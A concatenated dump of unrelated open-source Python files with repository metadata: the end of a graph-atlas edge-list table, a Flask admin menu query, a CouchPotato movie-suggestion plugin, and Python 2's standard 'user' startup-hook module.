[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1159',
7,
[[1, 2],
[1, 5],
[1, 7],
[2, 4],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1160',
7,
[[3, 4],
[5, 3],
[7, 4],
[5, 1],
[2, 5],
[5, 6],
[4, 2],
[6, 3],
[6, 1],
[7, 2],
[1, 7],
[6, 4],
[7, 5],
[4, 1]]],
['edgelist',
'G1161',
7,
[[1, 2],
[1, 6],
[1, 7],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1162',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1163',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[6, 7]]],
['edgelist',
'G1164',
7,
[[3, 4],
[5, 3],
[7, 4],
[5, 1],
[5, 6],
[4, 6],
[4, 2],
[6, 3],
[4, 1],
[2, 5],
[7, 1],
[2, 7],
[7, 5],
[1, 2]]],
['edgelist',
'G1165',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 7]]],
['edgelist',
'G1166',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1167',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 7],
[4, 5],
[4, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1168',
7,
[[1, 4],
[1, 5],
[1, 6],
[2, 3],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G1169',
7,
[[1, 4],
[1, 5],
[1, 6],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G1170',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[6, 7],
[1, 7],
[1, 3],
[6, 1],
[4, 6],
[2, 4],
[7, 2],
[5, 7],
[3, 5]]],
['edgelist',
'G1171',
7,
[[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 7],
[5, 6]]],
['edgelist',
'G1172',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[5, 6]]],
['edgelist',
'G1173',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[2, 5],
[2, 4],
[3, 1],
[5, 1],
[6, 4],
[2, 7]]],
['edgelist',
'G1174',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[2, 5],
[2, 4],
[3, 1],
[5, 1],
[6, 4],
[1, 7]]],
['edgelist',
'G1175',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[4, 5],
[4, 6],
[4, 7],
[6, 7]]],
['edgelist',
'G1176',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 6],
[2, 7],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1177',
7,
[[4, 5],
[5, 6],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[4, 7],
[5, 7],
[6, 7],
[2, 6],
[4, 6],
[3, 4],
[3, 5],
[2, 7],
[1, 2]]],
['edgelist',
'G1178',
7,
[[4, 5],
[5, 6],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[4, 7],
[2, 4],
[2, 5],
[2, 6],
[4, 6],
[3, 4],
[3, 5],
[7, 2],
[5, 7]]],
['edgelist',
'G1179',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 2],
[1, 6],
[6, 3],
[4, 6],
[5, 6],
[7, 2],
[6, 7]]],
['edgelist',
'G1180',
7,
[[5, 4],
[5, 6],
[6, 4],
[1, 2],
[1, 6],
[1, 4],
[3, 5],
[2, 6],
[2, 4],
[7, 6],
[4, 7],
[7, 1],
[2, 7],
[7, 3],
[5, 7]]],
['edgelist',
'G1181',
7,
[[4, 5],
[5, 6],
[6, 7],
[1, 5],
[1, 6],
[1, 7],
[4, 7],
[2, 4],
[5, 7],
[2, 6],
[4, 6],
[3, 4],
[3, 5],
[2, 7],
[1, 2]]],
['edgelist',
'G1182',
7,
[[1, 3],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1183',
7,
[[7, 2],
[5, 6],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[4, 7],
[2, 4],
[2, 5],
[2, 6],
[4, 6],
[3, 4],
[3, 5],
[6, 7],
[5, 7]]],
['edgelist',
'G1184',
7,
[[4, 5],
[5, 6],
[1, 4],
[1, 5],
[1, 6],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[2, 6],
[4, 6],
[3, 4],
[3, 5],
[6, 7],
[6, 3]]],
['edgelist',
'G1185',
7,
[[4, 5],
[5, 6],
[1, 4],
[1, 5],
[7, 1],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[2, 6],
[4, 6],
[3, 4],
[3, 5],
[6, 7],
[6, 3]]],
['edgelist',
'G1186',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[2, 4],
[3, 4],
[6, 2],
[4, 6],
[5, 4],
[3, 5],
[7, 3],
[4, 7],
[7, 2],
[1, 6],
[5, 1]]],
['edgelist',
'G1187',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[4, 2],
[5, 3],
[1, 5],
[4, 1],
[7, 4],
[5, 7],
[6, 5],
[4, 6],
[7, 3],
[6, 2]]],
['edgelist',
'G1188',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5],
[6, 4],
[5, 6],
[7, 5],
[6, 7],
[7, 4]]],
['edgelist',
'G1189',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 4],
[5, 3],
[7, 2],
[3, 7],
[6, 3],
[5, 6],
[7, 5],
[1, 7],
[7, 6],
[4, 7]]],
['edgelist',
'G1190',
7,
[[1, 2],
[6, 4],
[2, 4],
[1, 5],
[4, 1],
[5, 4],
[3, 5],
[6, 3],
[5, 6],
[7, 5],
[3, 7],
[7, 6],
[4, 7],
[7, 2],
[1, 7]]],
['edgelist',
'G1191',
7,
[[6, 3],
[5, 6],
[4, 2],
[1, 5],
[1, 6],
[1, 4],
[3, 5],
[2, 6],
[2, 5],
[7, 4],
[2, 7],
[7, 1],
[6, 7],
[7, 3],
[5, 7]]],
['edgelist',
'G1192',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[1, 4],
[3, 1],
[4, 2],
[7, 5],
[6, 7],
[7, 4],
[1, 7],
[7, 3],
[2, 7]]],
['edgelist',
'G1193',
7,
[[6, 3],
[4, 1],
[6, 4],
[1, 5],
[1, 6],
[5, 4],
[3, 5],
[2, 6],
[2, 5],
[7, 5],
[3, 7],
[7, 1],
[6, 7],
[7, 4],
[2, 7]]],
['edgelist',
'G1194',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1195',
7,
[[7, 2],
[5, 6],
[1, 4],
[1, 5],
[1, 6],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[1, 7],
[4, 6],
[3, 4],
[3, 5],
[6, 7],
[6, 3]]],
['edgelist',
'G1196',
7,
[[4, 5],
[1, 2],
[1, 4],
[1, 5],
[1, 6],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[2, 7],
[3, 4],
[3, 5],
[6, 7],
[6, 3]]],
['edgelist',
'G1197',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 7]]],
['edgelist',
'G1198',
7,
[[6, 3],
[5, 6],
[6, 4],
[1, 5],
[1, 2],
[2, 4],
[3, 5],
[4, 1],
[2, 5],
[7, 5],
[2, 7],
[7, 1],
[4, 7],
[7, 3],
[6, 7]]],
['edgelist',
'G1199',
7,
[[6, 1],
[5, 4],
[6, 4],
[6, 3],
[1, 2],
[2, 4],
[3, 5],
[4, 1],
[2, 5],
[7, 3],
[6, 7],
[7, 5],
[4, 7],
[7, 1],
[2, 7]]],
['edgelist',
'G1200',
7,
[[4, 5],
[5, 6],
[1, 4],
[5, 7],
[1, 2],
[2, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[1, 6],
[3, 4],
[3, 5],
[6, 7],
[6, 3]]],
['edgelist',
'G1201',
7,
[[1, 3],
[1, 4],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1202',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1203',
7,
[[4, 5],
[6, 1],
[1, 4],
[1, 5],
[5, 7],
[2, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[2, 6],
[3, 4],
[3, 5],
[6, 7],
[6, 3]]],
['edgelist',
'G1204',
7,
[[7, 5],
[6, 3],
[1, 4],
[1, 5],
[3, 5],
[2, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[4, 6],
[3, 4],
[1, 2],
[6, 7],
[5, 6]]],
['edgelist',
'G1205',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1206',
7,
[[1, 2],
[1, 3],
[1, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1207',
7,
[[3, 4],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[5, 6],
[2, 1],
[6, 3],
[7, 3],
[6, 7],
[7, 2],
[1, 7],
[7, 5],
[4, 7]]],
['edgelist',
'G1208',
7,
[[4, 1],
[4, 6],
[4, 5],
[3, 1],
[3, 6],
[3, 5],
[2, 5],
[2, 6],
[2, 1],
[7, 1],
[2, 7],
[7, 6],
[4, 7],
[7, 5],
[3, 7]]],
['edgelist',
'G1209',
7,
[[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1210',
7,
[[4, 5],
[7, 3],
[1, 4],
[1, 5],
[6, 1],
[2, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[5, 6],
[3, 4],
[3, 5],
[6, 2],
[6, 3]]],
['edgelist',
'G1211',
7,
[[4, 5],
[7, 3],
[1, 4],
[1, 5],
[6, 1],
[6, 7],
[4, 7],
[2, 4],
[2, 5],
[1, 2],
[5, 7],
[3, 4],
[3, 5],
[6, 2],
[6, 3]]],
['edgelist',
'G1212',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[7, 3],
[2, 7],
[7, 1],
[5, 7],
[6, 5],
[1, 6],
[4, 6],
[7, 4],
[6, 3],
[2, 6]]],
['edgelist',
'G1213',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[5, 6],
[3, 7]]],
['edgelist',
'G1214',
7,
[[4, 1],
[5, 2],
[5, 4],
[2, 4],
[5, 1],
[3, 6],
[7, 3],
[6, 7],
[2, 6],
[5, 6],
[4, 6],
[1, 6],
[1, 7],
[4, 7],
[5, 7],
[7, 2]]],
['edgelist',
'G1215',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1216',
7,
[[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1217',
7,
[[4, 5],
[6, 2],
[1, 4],
[1, 5],
[6, 1],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[4, 6],
[3, 4],
[3, 5],
[6, 7],
[5, 6],
[3, 6]]],
['edgelist',
'G1218',
7,
[[3, 5],
[4, 2],
[4, 1],
[5, 4],
[5, 1],
[6, 3],
[5, 6],
[6, 1],
[4, 6],
[6, 2],
[7, 6],
[2, 7],
[4, 7],
[7, 1],
[5, 7],
[7, 3]]],
['edgelist',
'G1219',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1220',
7,
[[3, 5],
[5, 2],
[4, 1],
[4, 2],
[5, 1],
[6, 3],
[5, 6],
[6, 1],
[4, 6],
[7, 6],
[2, 6],
[7, 2],
[4, 7],
[5, 7],
[7, 3],
[7, 1]]],
['edgelist',
'G1221',
7,
[[1, 2],
[1, 4],
[1, 6],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1222',
7,
[[3, 6],
[1, 2],
[5, 6],
[2, 4],
[6, 1],
[5, 4],
[6, 4],
[3, 5],
[2, 5],
[4, 1],
[7, 4],
[3, 7],
[7, 5],
[6, 7],
[7, 2],
[1, 7]]],
['edgelist',
'G1223',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1224',
7,
[[3, 6],
[6, 2],
[4, 2],
[1, 5],
[6, 1],
[5, 4],
[6, 4],
[3, 5],
[2, 5],
[4, 1],
[7, 3],
[5, 7],
[6, 7],
[7, 2],
[1, 7],
[4, 7]]],
['edgelist',
'G1225',
7,
[[2, 7],
[1, 2],
[1, 4],
[1, 5],
[6, 1],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[4, 6],
[3, 4],
[3, 5],
[6, 7],
[5, 6],
[3, 6]]],
['edgelist',
'G1226',
7,
[[4, 5],
[6, 2],
[1, 4],
[1, 5],
[6, 1],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[2, 7],
[3, 4],
[3, 5],
[6, 7],
[1, 2],
[3, 6]]],
['edgelist',
'G1227',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6]]],
['edgelist',
'G1228',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1229',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[6, 7]]],
['edgelist',
'G1230',
7,
[[3, 6],
[6, 2],
[4, 6],
[1, 5],
[1, 2],
[5, 4],
[4, 3],
[3, 5],
[2, 5],
[1, 6],
[7, 5],
[3, 7],
[7, 4],
[6, 7],
[7, 2],
[1, 7]]],
['edgelist',
'G1231',
7,
[[6, 7],
[6, 2],
[1, 4],
[1, 5],
[1, 2],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[4, 6],
[3, 4],
[3, 5],
[7, 3],
[5, 6],
[3, 6]]],
['edgelist',
'G1232',
7,
[[4, 5],
[6, 2],
[1, 4],
[1, 5],
[1, 2],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[6, 1],
[3, 4],
[3, 5],
[7, 3],
[7, 6],
[3, 6]]],
['edgelist',
'G1233',
7,
[[6, 1],
[6, 2],
[1, 4],
[1, 5],
[7, 2],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[4, 6],
[3, 4],
[3, 5],
[7, 3],
[5, 6],
[3, 6]]],
['edgelist',
'G1234',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[5, 6],
[7, 3],
[2, 7]]],
['edgelist',
'G1235',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1236',
7,
[[5, 1],
[5, 4],
[1, 2],
[4, 1],
[3, 5],
[4, 2],
[6, 4],
[5, 6],
[6, 3],
[7, 6],
[6, 1],
[2, 6],
[7, 2],
[1, 7],
[7, 5],
[3, 7],
[4, 7]]],
['edgelist',
'G1237',
7,
[[1, 2],
[6, 2],
[6, 4],
[1, 5],
[6, 1],
[5, 4],
[4, 2],
[3, 6],
[2, 5],
[4, 1],
[3, 5],
[7, 3],
[6, 7],
[7, 4],
[2, 7],
[7, 1],
[5, 7]]],
['edgelist',
'G1238',
7,
[[4, 5],
[6, 2],
[1, 4],
[1, 5],
[5, 6],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[1, 2],
[4, 6],
[3, 4],
[3, 5],
[3, 6],
[6, 1],
[6, 7],
[7, 3]]],
['edgelist',
'G1239',
7,
[[4, 3],
[5, 2],
[1, 2],
[4, 1],
[3, 5],
[5, 4],
[6, 2],
[5, 6],
[6, 3],
[1, 6],
[6, 4],
[7, 6],
[3, 7],
[7, 4],
[1, 7],
[2, 7],
[5, 7]]],
['edgelist',
'G1240',
7,
[[4, 3],
[5, 2],
[5, 1],
[4, 1],
[3, 5],
[4, 2],
[6, 3],
[5, 6],
[6, 1],
[4, 6],
[6, 2],
[7, 6],
[3, 7],
[7, 1],
[4, 7],
[7, 5],
[2, 7]]],
['edgelist',
'G1241',
7,
[[4, 3],
[6, 2],
[6, 1],
[1, 5],
[1, 2],
[5, 4],
[6, 4],
[3, 6],
[2, 5],
[4, 1],
[3, 5],
[7, 5],
[6, 7],
[7, 3],
[4, 7],
[7, 1],
[2, 7]]],
['edgelist',
'G1242',
7,
[[4, 3],
[6, 2],
[6, 1],
[1, 5],
[5, 6],
[1, 2],
[4, 2],
[3, 6],
[2, 5],
[4, 1],
[3, 5],
[7, 1],
[4, 7],
[7, 2],
[6, 7],
[7, 3],
[5, 7]]],
['edgelist',
'G1243',
7,
[[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1244',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[5, 6],
[7, 2],
[1, 7],
[6, 7]]],
['edgelist',
'G1245',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7]]],
['edgelist',
'G1246',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1247',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1248',
7,
[[5, 1],
[5, 6],
[4, 1],
[4, 6],
[3, 1],
[3, 6],
[2, 4],
[2, 5],
[2, 6],
[2, 1],
[3, 4],
[3, 5],
[7, 1],
[6, 7],
[7, 2],
[3, 7],
[7, 5],
[4, 7]]],
['edgelist',
'G1249',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1250',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1251',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1252',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]]]
GAG=[]
for i in range(1253):
g=make_small_graph(descr_list[i])
GAG.append(g)
return GAG
| apache-2.0 |
chenghao/haoAdmin_flask | dal/__init__.py | 1 | 1454 | # coding:utf-8
from models import HMenu, HOrg, HRole, HUser
from peewee import JOIN_INNER, fn
__author__ = "chenghao"
def init_menus(user_id):
"""
用户登录时获取当前用户的菜单数据集
:param user_id: 用户id
:return:
"""
sql = HMenu.select(
HMenu.pid, HMenu.menu_name.alias("title"), HMenu.menu_url.alias("href"), HMenu.parent_menu, HMenu.icon
).join(
HOrg, join_type=JOIN_INNER, on=HMenu.org_ids ** (fn.CONCAT("%,", HOrg.pid, ",%"))
).join(
HRole, join_type=JOIN_INNER, on=HMenu.role_ids ** (fn.CONCAT("%,", HRole.pid, ",%"))
).join(
HUser, join_type=JOIN_INNER,
on=((HUser.org_ids ** (fn.CONCAT("%,", HOrg.pid, ",%"))) &
(HUser.role_ids ** (fn.CONCAT("%,", HRole.pid, ",%"))))
).where(
HUser.pid == user_id
).order_by(HMenu.parent_menu, HMenu.sort)
result = [f for f in sql.dicts()]
level_1_menus = [] # 一级菜单集合
level_2_menus = {} # 二级菜单集合
level_1_child_key = "menu_%s"
for res in result:
if res["parent_menu"]:
menus = level_2_menus[level_1_child_key % res["parent_menu"]]
menus.append(res)
level_2_menus[level_1_child_key % res["parent_menu"]] = menus
else:
level_2_menus[level_1_child_key % res["pid"]] = []
level_1_menus.append(res)
return {"level1": level_1_menus, "level2": level_2_menus}
| apache-2.0 |
jeroenj/CouchPotatoServer | couchpotato/core/media/movie/suggestion/main.py | 7 | 3765 | from couchpotato.api import addApiView
from couchpotato.core.event import fireEvent
from couchpotato.core.helpers.variable import splitString, removeDuplicate, getIdentifier
from couchpotato.core.plugins.base import Plugin
from couchpotato.environment import Env
autoload = 'Suggestion'
class Suggestion(Plugin):
def __init__(self):
addApiView('suggestion.view', self.suggestView)
addApiView('suggestion.ignore', self.ignoreView)
def suggestView(self, limit = 6, **kwargs):
movies = splitString(kwargs.get('movies', ''))
ignored = splitString(kwargs.get('ignored', ''))
seen = splitString(kwargs.get('seen', ''))
cached_suggestion = self.getCache('suggestion_cached')
if cached_suggestion:
suggestions = cached_suggestion
else:
if not movies or len(movies) == 0:
active_movies = fireEvent('media.with_status', ['active', 'done'], single = True)
movies = [getIdentifier(x) for x in active_movies]
if not ignored or len(ignored) == 0:
ignored = splitString(Env.prop('suggest_ignore', default = ''))
if not seen or len(seen) == 0:
movies.extend(splitString(Env.prop('suggest_seen', default = '')))
suggestions = fireEvent('movie.suggest', movies = movies, ignore = ignored, single = True)
self.setCache('suggestion_cached', suggestions, timeout = 6048000) # Cache for 10 weeks
return {
'success': True,
'count': len(suggestions),
'suggestions': suggestions[:int(limit)]
}
def ignoreView(self, imdb = None, limit = 6, remove_only = False, mark_seen = False, **kwargs):
ignored = splitString(Env.prop('suggest_ignore', default = ''))
seen = splitString(Env.prop('suggest_seen', default = ''))
new_suggestions = []
if imdb:
if mark_seen:
seen.append(imdb)
Env.prop('suggest_seen', ','.join(set(seen)))
elif not remove_only:
ignored.append(imdb)
Env.prop('suggest_ignore', ','.join(set(ignored)))
new_suggestions = self.updateSuggestionCache(ignore_imdb = imdb, limit = limit, ignored = ignored, seen = seen)
return {
'result': True,
'ignore_count': len(ignored),
'suggestions': new_suggestions[limit - 1:limit]
}
def updateSuggestionCache(self, ignore_imdb = None, limit = 6, ignored = None, seen = None):
# Combine with previous suggestion_cache
cached_suggestion = self.getCache('suggestion_cached') or []
new_suggestions = []
ignored = [] if not ignored else ignored
seen = [] if not seen else seen
if ignore_imdb:
suggested_imdbs = []
for cs in cached_suggestion:
if cs.get('imdb') != ignore_imdb and cs.get('imdb') not in suggested_imdbs:
suggested_imdbs.append(cs.get('imdb'))
new_suggestions.append(cs)
# Get new results and add them
if len(new_suggestions) - 1 < limit:
active_movies = fireEvent('media.with_status', ['active', 'done'], single = True)
movies = [getIdentifier(x) for x in active_movies]
movies.extend(seen)
ignored.extend([x.get('imdb') for x in cached_suggestion])
suggestions = fireEvent('movie.suggest', movies = movies, ignore = removeDuplicate(ignored), single = True)
if suggestions:
new_suggestions.extend(suggestions)
self.setCache('suggestion_cached', new_suggestions, timeout = 3024000)
return new_suggestions
| gpl-3.0 |
matmutant/sl4a | python/src/Lib/user.py | 313 | 1627 | """Hook to allow user-specified customization code to run.
As a policy, Python doesn't run user-specified code on startup of
Python programs (interactive sessions execute the script specified in
the PYTHONSTARTUP environment variable if it exists).
However, some programs or sites may find it convenient to allow users
to have a standard customization file, which gets run when a program
requests it. This module implements such a mechanism. A program
that wishes to use the mechanism must execute the statement
import user
The user module looks for a file .pythonrc.py in the user's home
directory and if it can be opened, execfile()s it in its own global
namespace. Errors during this phase are not caught; that's up to the
program that imports the user module, if it wishes.
The user's .pythonrc.py could conceivably test for sys.version if it
wishes to do different things depending on the Python version.
"""
from warnings import warnpy3k
warnpy3k("the user module has been removed in Python 3.0", stacklevel=2)
del warnpy3k
import os
home = os.curdir # Default
if 'HOME' in os.environ:
home = os.environ['HOME']
elif os.name == 'posix':
home = os.path.expanduser("~/")
elif os.name == 'nt': # Contributed by Jeff Bauer
if 'HOMEPATH' in os.environ:
if 'HOMEDRIVE' in os.environ:
home = os.environ['HOMEDRIVE'] + os.environ['HOMEPATH']
else:
home = os.environ['HOMEPATH']
pythonrc = os.path.join(home, ".pythonrc.py")
try:
f = open(pythonrc)
except IOError:
pass
else:
f.close()
execfile(pythonrc)
| apache-2.0 |
